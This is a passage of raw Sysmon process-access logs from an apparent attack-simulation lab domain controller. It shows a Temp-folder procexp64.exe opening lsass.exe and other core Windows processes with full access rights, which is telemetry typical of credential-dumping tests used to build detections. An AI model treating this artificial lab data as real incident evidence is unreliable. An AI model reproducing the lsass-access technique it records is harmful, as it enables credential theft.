15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonE